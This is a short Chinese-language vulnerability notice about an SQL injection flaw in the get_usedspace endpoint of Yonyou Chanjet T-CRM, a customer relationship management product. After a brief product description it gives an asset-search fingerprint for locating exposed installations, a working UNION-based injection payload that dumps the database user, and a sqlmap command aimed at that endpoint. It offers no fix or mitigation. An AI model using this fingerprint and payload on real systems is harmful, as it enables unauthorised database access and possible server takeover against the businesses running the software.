用友畅捷通CRM get_usedspace存在SQL注入漏洞
一、漏洞简介
用友畅捷通T-CRM是用友公司全力打造的一款基于B/S架构、拥有强大自定义功能、多部门协作(市场、销售和服务)、基于客户全生命周期管理的客户关系管理软件。客户通主要面向成长型中小企业,以客户为中心,以客户营销为目的,帮助他们 " 提升营销能力,网罗天下商机"。畅捷CRM系统get_usedspace存在SQL注入漏洞 ,攻击者可以利用该漏洞获取网站后台数据库敏感信息,甚至接管服务器权限,构成严重风险。
二、影响版本
- 用友畅捷通T-CRM
三、资产测绘
- hunter
web.icon=="223dcd70f982801e9177078a818a9b59" - 特征
四、漏洞复现
/webservice/get_usedspace.php?site_id=-999 UNION ALL SELECT CONCAT(0x7e,0x7e,user(),0x7e,0x7e)--
sqlmap
python3 sqlmap.py -u "http://xx.xx.xx.xx/webservice/get_usedspace.php?site_id=1" --batch